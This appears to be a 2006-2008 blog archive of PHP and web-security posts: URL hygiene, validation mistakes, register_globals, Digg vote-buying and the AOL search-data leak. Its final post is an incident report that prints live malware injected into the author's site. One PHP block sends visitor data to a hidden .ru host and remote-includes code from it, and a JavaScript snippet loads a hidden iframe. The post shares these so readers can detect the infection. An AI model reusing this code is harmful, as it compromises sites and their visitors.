Archive for the 'Security' Category

OSCON 2008: SNAP - PHP Taint Tool

Wednesday, July 23rd, 2008

Here are the slides for my talk today at OSCON.

Keep the disclaimer at the start at the front of your mind.

This tool is fragile and not ready to be called alpha quality
It is definitely not ready to be useful on large programs
We will release it under an OSI license … soon

SNAP Presentation (PDF)

Following the big dogs on web application security

Friday, December 21st, 2007

(This post originally appeared as part of the 2007 PHP Advent calendar)

At this time of year people are apt to get all warm and sentimental … Right up until their first trip to a mall on a Saturday when they go back to hating their fellow man and instituting an “If Amazon don’t sell it, you’re not getting it” policy on gift giving. December is very important to retail, and very important to retail sites.

I remember some good advice I read a long time ago. Vincent Flanders & Michael Willis in Web Pages That Suck suggested you “follow the big dogs”, in other words copy Amazon. Their reasoning was sound. You will likely get it wrong on your first try, you can’t afford to run usability studies of your own, and don’t want to spend months and numerous iterations getting it right. Learning from other people’s mistakes is always less embarrassing than learning from your own.

I have had to paraphrase here, because I opted to recycle nearly all my old books rather than ship them half way around the world. Had I wanted to check the accuracy of my quote, it would have cost me one cent to buy a second hand copy of that book.

While the long term relevance of most of the advice in old computer books is fairly accurately reflected by that valuation, it was good advice in 1998. If you were embarking on an ecommerce venture at a time when there was a shortage of people who knew what they were doing, best practice conventions were not settled, and innovation was rapid, there were worse philosophies you could have than “What Would Amazon Do?”

The same idea is popular today, and for the same reason. There is always a shortage of people who really know what they are doing, so there are plenty of people making decisions by asking “What Would Google/Amazon/Microsoft/eBay/PayPal/Flickr/Yahoo/YouTube/Digg/Facebook Do?” If you are in a space where nobody really knows the best way yet, copying the segment leader is a low risk, low talent shortcut to making mainly good decisions, even if it does mean you are always three months behind.

The idea does not apply well to web application security. There are two main reasons for this: first, the big dogs make plenty of mistakes, and second, good security is invisible.

You might notice mistakes, you might read about exploited vulnerabilities and you might notice PR based attempts at the illusion of security, but you probably don’t notice things quietly being done well.

Common big dog mistakes include:

  • Inviting people to click links in email messages.
    You would think that, as one of the most popular phishing targets out there, PayPal would not want to encourage people to click links in emails. Yet, if you sign up for a PayPal account, the confirmation screen requests that you do exactly that.

    PayPal Confirmation Screen

  • Stupid validation rules.
    We all want ways to reject bad data, but it is usually not easy to define hard and fast rules to recognize it, even for data with specific formatting. Everybody wants a simple regex to check that email addresses are well formed. Unfortunately, to permit any email that would be valid according to RFC 2822, a simple one is not going to cut it, which means that many, many people add validation that is broken and rejects some real addresses. Most are not as stupid as the one AOL used to have for signing up for AIM, which insisted that all email addresses ended in .com, .net, .org, .edu or .mil, but many will reject + and other valid non-alphanumeric characters in the local part of an address (the bit before the @).
  • Stupid censorship systems
    Simple keyword based censorship always annoys people. Eventually, somebody named Woodcock is going to turn up.
    Xbox Live is infamous for rejecting gamertags and mottos after validating them against an extensive list of “inappropriate” words. Going far beyond comedian George Carlin’s notorious Seven Dirty Words, there is a list of about 2700 words that are supposedly banned. By the time you add your regular seven, all possible misspellings thereof, most known euphemisms for body parts, racial epithets, drug related terms, Microsoft brand names, Microsoft competitors’ brand names, terms that sound official and start heading off into foreign languages, you end up catching a lot of innocent phrases.
  • Broken HTML filtering.
    Stripping all HTML from user submitted content and safely displaying the result is often done badly, but is not that difficult. On the other hand, allowing some HTML formatting as user input, but disallowing “dangerous” parts is not an easy problem, especially if you are trying to foster an ecosystem of third party developers.

    The MySpace Samy worm worked not because MySpace failed to filter input, but because of a series of minor cracks that, combined, allowed arbitrary JavaScript. Once you choose to allow CSS so that users can add what passes for style on MySpace, it becomes very hard to limit people to only visual effects.

    eBay has had less well known problems with a similar cause, but without a dramatic replicating worm implementation. Earlier this year scammers were placing large transparent divs over their listings so that any click on the page triggered a mailto or loaded a page of their own. I could not see examples today, so I assume they have fixed the specific vector, but giving users a great deal of freedom to format content that they upload makes ensuring that content is safe for others to view very difficult.

  • Stupidly long URLs
    The big dogs love long, complicated URLs.

          https://chat.bankofamerica.com/hc/LPBofA2/?visitor=&mse
          ssionkey=&cmd=file&file=chatFrame&site=LPBofA2&channel=
          web&d=1185830684250&referrer=%28engage%29%20https%3A//s
          itekey.bankofamerica.com/sas/signon.do%3F%26detect%3D3&
          sessionkey=H6678674785673531985-3590509392420069059K351
          97612

    Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

  • Looking for simple solutions
    Security is not one simple problem, or even a set of simple problems, so looking for simple solutions such as the proposed .bank TLD is rarely helpful. This is not helped by the vendor-customer nature of much of the computer industry. The idea that you can write a check to somebody and a problem goes away is very compelling - buy a more expensive domain name, or a more expensive Extended Validation Certificate, or run an automated software scan to meet PCI compliance and you might sleep more soundly at night, but many users already don’t understand the URL and other clues that their browser provides them. Giving more subtle clues to them is unlikely to help. Displaying a GIF in the corner of your web page bragging about your safety might create the illusion of security and might well help sales, but it won’t actually help safety on its own.
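Returning to the email-validation example above, here is a minimal sketch of the problem. The naive pattern below is illustrative only, not any particular site’s real rule; it shows how an over-strict regex rejects a perfectly legal address that PHP’s own filter_var() (available since PHP 5.2) accepts:

```php
<?php
// A naive pattern of the kind many sites deploy: it forgets that '+'
// and various other characters are legal in the local part, and that
// TLDs are not limited to a fixed list.
function naive_email_check($email)
{
    return (bool) preg_match(
        '/^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+\.(com|net|org|edu|mil)$/',
        $email
    );
}

$address = 'first.last+filter@example.org';

var_dump(naive_email_check($address));                        // bool(false) - wrongly rejected
var_dump((bool) filter_var($address, FILTER_VALIDATE_EMAIL)); // bool(true)  - RFC-aware check
```

If you must validate addresses, starting from filter_var() with FILTER_VALIDATE_EMAIL beats rolling your own pattern, and sending a confirmation message beats both.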

You can’t follow the public example of the big dogs. They still make some dumb decisions, they still make the small mistakes that allow the CSRF and XSS exploits that are endemic and they are often not very responsive to disclosures. If a major site makes 99 good security decisions and one bad one, you won’t notice the 99. Unfortunately with security you are still far better off seeing how others have been exploited and critically evaluating what they say they should be doing, rather than trying to watch what they actually are doing.

Oh, and remember to stay away from malls on weekends in December.

Short, Clean URIs Are More Secure

Tuesday, July 31st, 2007

There are lots of reasons to use clean, short, readable URIs. Search engines like them. People have some hope of dictating or typing them correctly. Email clients are less likely to mung or truncate them. They give people navigational cues and an extra way to navigate a website. You can even fit them on one billboard (unlike say this one).

One generally ignored advantage is security.

Many phishing, XSS, CSRF and other URI exploits rely at least in part on putting stuff the user does not understand in the URI.

Here are a few real URIs from popular websites all found inside a minute within 3 clicks of the home page:

Having let people get used to that sort of garbage from sites that they should be able to trust, you can’t really be surprised that normal people can’t tell the difference between an XSS attack hidden in URL encoded JavaScript and a real, valid, safe URI. Even abnormal people who can decode a few common URL encodings in their heads are not really scrolling across the hidden nine tenths of the address bar to look at that lot.

It won’t help everybody. There are always going to be people who are happy to believe that their bank sends them email from a free address like bank.of.amerika@hotmail.com, and sufficiently sophisticated social engineering is always going to work on some people, some of the time, but the sites that are particularly popular with phishing attacks are making it unnecessarily easy.

If commonly used sites had short, sensible URIs, it would not take genius on the part of slightly cynical users to notice that every real bank URI they had seen in the past looked something like https://www.bankofamerica.com/myaccount/login, so the 300-character monstrosity full of percent symbols and ampersands that they were being presented with was a little on the fishy side.

Now, go and tidy your room.

I ♥ register_globals

Tuesday, March 13th, 2007

I am aware that there are some things so shocking that you are not supposed to say them in polite company. “Hitler had some good ideas”, “Tori Spelling is really pretty” and “I think I look really good in a beret” are all ideas so confronting that they are best kept to yourself regardless of how strongly you believe them.

I have a similarly shocking sentiment that I feel I have to share.

I really like register_globals in PHP.

There, I’ve said it. I can go away and order my I ♥ register_globals shirt now.

I (heart) register_globals

Sure, choosing to mingle untrusted user data and internal variables is a bad idea. Sure, if you are too lazy to initialise important variables with a starting value it gives you one extra way to shoot yourself in the foot. Sure, polluting global scope with form variables is going to be a mess in a larger app.

There remains something to be said for simple, elegant, readable ways to shoot yourself in the foot. PHP, like any reasonably complete programming language, provides a whole host of other ways, so removing one is not particularly useful.

I used to teach PHP to beginners as a first programming language. I have introduced a few thousand complete novices to programming via PHP.

With register_globals on, this example is a short step from the “Hello World!” example:

<?php
if($name)
{
 echo "Hello $name";
}
else
{
 echo
  '<form>
   Enter your name: <input type="text" name="name">
   <input type="submit">
  </form>';
}
?>

It flows nicely from a “Hello World!” example. It can introduce variables and control structure if you did not provide an even softer introduction to them. It can be turned into an example with a practical use without making the code more complex.

This version may not look very different to you:

<?php
if($_REQUEST['name'])
{
 echo "Hello {$_REQUEST['name']}";
}
else
{
 echo
  '<form>
   Enter your name: <input type="text" name="name">
   <input type="submit">
  </form>';
}
?>

To an experienced eye, the two versions are almost identical. The second requires a little more typing, but nothing to get excited over.

To a complete beginner though, the second is a couple of large leaps away from the first. To understand the second version, somebody has to understand arrays, and PHP string interpolation. Both of these are important topics that they will have to come to in their first few hours of programming, but without register_globals, they stand in the way of even the most trivial dynamic examples.

I miss being able to assume register_globals as default behaviour. It made the initial learning curve far less steep. It made little examples cleaner and more readable. Like most safety measures, it does not really protect people who are determined to get themselves into trouble anyway. People who don’t understand the reasons behind it just run extract() or some code of their own to pull incoming variables out anyway. The user submitted comments in the manual used to be full of sample code for doing exactly that.
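The extract() workaround mentioned above takes one line, which is exactly why turning register_globals off protects nobody who is determined. A minimal sketch (the request variable is simulated here; in a web context PHP fills $_REQUEST itself):

```php
<?php
// Simulate an incoming request so the example runs from the command line.
$_REQUEST['name'] = 'World';

// Recreating register_globals by hand: pull every incoming request
// variable into the current scope, clobber risks and all.
extract($_REQUEST);

echo "Hello $name"; // Hello World

// Passing EXTR_SKIP at least refuses to overwrite variables that already
// exist, which is marginally safer than the default EXTR_OVERWRITE:
// extract($_REQUEST, EXTR_SKIP);
```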

Oh, but just a side note to all beret-wearing white supremacist Tori Spelling fans: just because I am willing to speak up for one unpopular cause does not mean I am interested in yours. Sorry.

Melbourne PHP Users’ Group - March 8th

Wednesday, March 7th, 2007

On Thursday, I will be speaking at PHP Melbourne. My talk is titled PHP Considered Harmful. In case you are wondering though, it does not mean I have had a falling out with PHP. I have spent 10 years talking about what’s great in PHP and I need to vent occasionally. Come along if you are nearby. If not, and I am not strung up by an angry mob, I might redo the talk in another hemisphere later in the year.

The other speaker is Chris Burgess on Building Secure Web Applications.

His blurb:

This presentation expands on a presentation given at the Open Source Developers’ Conference in December 2006 titled “Web Application Security - Tools, Techniques, Tips and Tricks”. I will explore some of the original material for those who were unable to attend, taking a look at the plethora of Open Source tools that can greatly assist developers and testers of web applications. In addition to this, I will discuss techniques that can be used to harden web applications.

Digg’s Kevin Rose Has an Account on User/Submitter?

Saturday, March 3rd, 2007

If you missed it, User/Submitter is a paid service allowing people to buy diggs.

They are very upfront about their business model. Submitters (people who want stories promoted) pay $20 plus $1 per digg. Users (Digg users whose second job as a WoW gold farmer is getting tedious) get paid about 17c per digg. So buying 100 diggs costs $120, and in theory nearly $17 of that gets paid out to diggers. There is a $20 payout minimum, though, so the chances of many people diligently digging away and making 120 paid diggs before their account gets noticed and shut off seem slim. Either way, it is a nice profit margin while they can get away with it.

Digg, unsurprisingly, don’t seem to be fans. Poking around, I can see accounts are being disabled. One of mine got disabled, but that might be a bad example because I was not very subtle. Commenting on stories I dugg to say that I had dugg them for 17c is probably more blatant than most. Result:
disabled

Looking at other accounts with suspicious behaviour, though, I see a few of these:
invalid

Privacy is not particularly well guarded at User/Submitter. If you want to know if a digg user name is registered there, then try to register it. An interesting username to try is kevinrose.

Kevin Rose On User/Submitter

Of course, the experiment is somewhat flawed. You can only check once, and while a negative result is definitive, a positive result might just mean that somebody else performed the same experiment before you. Rumours of Digg’s demise might be popular, but I don’t think Kevin yet needs a side job paying 17c per click.

Suspicious behaviour, though, is not hard to find. Here is a list of Digg stories that received paid diggs in the last few hours.
http://digg.com/videos/people/Backflipping_Midget_Chased_by_Cops
http://digg.com/offbeat_news/Russian_wrestling_gone_amazing
http://digg.com/gadgets/The_ULTIMATE_domain_search_tool
http://digg.com/world_news/Photo_essay_Unexploded_bombs_are_everywhere_in_Iraq
http://digg.com/tech_news/Lenovo_Recalls_209_000_Notebook_Batteries
http://digg.com/2008_us_elections/Who_Else_Wants_to_Bash_Bush_Now
http://digg.com/videos/educational/Blind_Turkish_Book_Reviewer_The_Alchemist
http://digg.com/gadgets/Nikon_D40_Review_Good_Camera_at_a_Great_Value

Unsurprisingly, there are a number of the same users digging many of them.

What a social site should do about abuse is a harder problem. Any competitive environment is bound to get people gaming or abusing the system. I am not sure that disabling accounts is the best solution though. If I were a third-world subsistence gold farmer sitting in an internet cafe clicking links for a few cents at a time and my account got disabled, I would just create a new one that needs to be detected and disabled. If my account silently got flagged as a source of worthless diggs, and just ignored in calculations, then I would merrily continue clicking away, and over time nearly all bought diggs would be worthless because they would mostly be being paid out to accounts that have already been detected.

Publicly disabling accounts is good for maintaining the appearance of transparency, but longer term, allowing abusive users individual sandboxes to play in lets them waste time without affecting others. In a system where reregistering under another alias is painless, disabling accounts is not a very effective deterrent.
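The silent-flagging idea can be sketched in a few lines. This is hypothetical illustration, not Digg’s actual implementation; the record shape and field names are invented. The promotion calculation simply ignores diggs from flagged accounts while still recording them, so the flagged digger sees nothing amiss:

```php
<?php
// Hypothetical sketch of silently discounting flagged accounts.
// $diggs is a list of ['user' => ..., 'flagged' => ...] records for one story.
function effective_digg_count(array $diggs)
{
    $count = 0;
    foreach ($diggs as $digg) {
        // Flagged diggers still see their digg recorded on the page;
        // it just never counts towards promotion.
        if (empty($digg['flagged'])) {
            $count++;
        }
    }
    return $count;
}

$diggs = array(
    array('user' => 'honest_user',  'flagged' => false),
    array('user' => 'paid_clicker', 'flagged' => true),
    array('user' => 'another_user', 'flagged' => false),
);
echo effective_digg_count($diggs); // 2
```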

BombOrNot.com

Wednesday, February 7th, 2007

In the wake of the Boston Aqua Teen Hunger Force bomb scare, I find this site much funnier than previously.

http://www.bombornot.com/

The Utter Stupidity of AOL is Staggering

Monday, August 7th, 2006

OK, that is not news, but I am paraphrasing Techcrunch’s coverage of the AOL Research data release.

For a while, AOL Research put data on 20 million web searches by 650,000 of their subscribers up for download. The link was fairly quickly taken down, but once information is released it is very hard to take it back. I am sure you can find a mirror or torrent if you look.

Because it is data on a selection of logged-in AOL users, it contains a continuous record of their searches over time (March to May 2006). Because you have a record of searches over a period of time, you can start to make some assumptions about the user or the household, and depending on the information the user has searched for you can sometimes identify them.

Many commenters on Digg don’t seem to see it as a problem, but then maybe their search history does not make it look like they are searching for information on their family tree, information for English teachers in a conservative US state, and the website of a local church, chamber of commerce, and Rotary chapter in the same state, in between searching for MySpace, cheerleaders, preteen sex and strap-on sex toys. AOL has kindly replaced these people’s screen names with sequential integers, but I am guessing if you went to that church, chamber of commerce, or Rotary chapter you would be able to pick an English teacher with that surname.

Maybe he made all those searches and deserves to be found out. Maybe he shares one internet connection with his son. Maybe his next-door neighbour steals his WiFi. In any case, I expect that the free AOL CD he picked up a while ago might suddenly have become pretty expensive.

Building an Asynchronous Multiuser Web App for Fun … and Maybe Profit

Wednesday, July 26th, 2006

Here are the slides for my talk today.

I will put up a cleaner version of the code in a couple of weeks, but here is today’s version. It comes with an ironclad guarantee about its bug-free status. I just won’t tell you exactly what I am guaranteeing.
poker.pdf
poker_0.1.zip
The mysqldump of the database

Spyware and popups close to home

Monday, February 27th, 2006

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleazy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it had been altered: code had been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru domain.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps such as forums and blogs require you to have some files and directories writable, so if you are choosing such software for a shared host, see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.

If you have rarely checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from the samples below (perhaps “error_reporting(0)”) to make sure you are not in the same boat.

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate these sort of business practices and the arseclowns that practice them, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($g).".".base64_encode($h).".".base64_encode($n);
if((include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str)))
{}
else {
include_once(base64_decode("aHR0cDovLw==").
base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

or


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

which de-obfuscated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>
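The JavaScript de-obfuscates itself by subtracting 3 from every character code, a plain Caesar shift (that is what the charCodeAt(t++)-3 in the loop above does). The same decoding in PHP:

```php
<?php
// Reverse the payload's encoding: each character was shifted up 3 code points,
// so shifting back down 3 recovers the hidden markup.
function shift_decode($encoded, $shift = 3)
{
    $decoded = '';
    for ($i = 0, $len = strlen($encoded); $i < $len; $i++) {
        $decoded .= chr(ord($encoded[$i]) - $shift);
    }
    return $decoded;
}

// The first few characters of the payload decode to the start of the div:
echo shift_decode('?gly#vw|oh@'); // <div style=
```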

In one file I also found:

<a href = "http://mrsnebraskaamerica.com/catalog/images/sierra/hackmai-2.0.shtml" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted files with generic-sounding names created, like date.php and report.php, and .htaccess files created or appended to in order to direct 404s to the new bogus files.